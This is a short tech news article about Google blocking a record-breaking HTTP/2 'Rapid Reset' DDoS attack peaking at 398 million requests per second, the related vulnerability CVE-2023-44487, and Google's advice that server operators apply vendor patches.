Google says it has stopped the “largest Distributed Denial of Service” (DDoS) attack ever and, together with industry peers, discovered the vulnerability that made the attack possible in the first place.
In a blog post Outlining its work, Google says the blocked attack was 7.5 times larger than the largest DDoS incident ever recorded. This latest record-setter peaked at 398 million requests per second (rps), compared to 46 million rps, the previous record set last year.
“The most recent wave of attacks began in late August and continues today, targeting major infrastructure providers, including Google services, Google Cloud infrastructure, and our customers,” Google said.
Quick reset
To enable such a powerful attack, the unnamed threat actors deployed a new HTTP/2 technique called ‘Rapid Reset’, based on stream multiplexing, Google explains. Stream multiplexing is a feature of the “widely accepted” HTTP/2 protocol, the company said, adding that the technical details can be found at this link.
Shortly after detecting the attack, Google introduced additional mitigation strategies and reached out to industry peers (cloud providers and the like) that also use the HTTP/2 protocol stack. “We shared information about the attack and mitigation methods in real time as the attacks were underway,” Google said.
Together they identified a vulnerability in the protocol stack, tracked as CVE-2023-44487, a high-severity flaw with a CVSS score of 7.5/10.
Companies should investigate whether their servers running HTTP/2 are not vulnerable, Google says, or, if so, apply the patch. “If you manage or operate your own HTTP/2 compliant server (open source or commercial), you should immediately apply a patch from the relevant vendor as soon as it becomes available,” the company concluded.
DDoS attacks are a common tactic among cybercriminals, disrupting Internet-facing websites and services.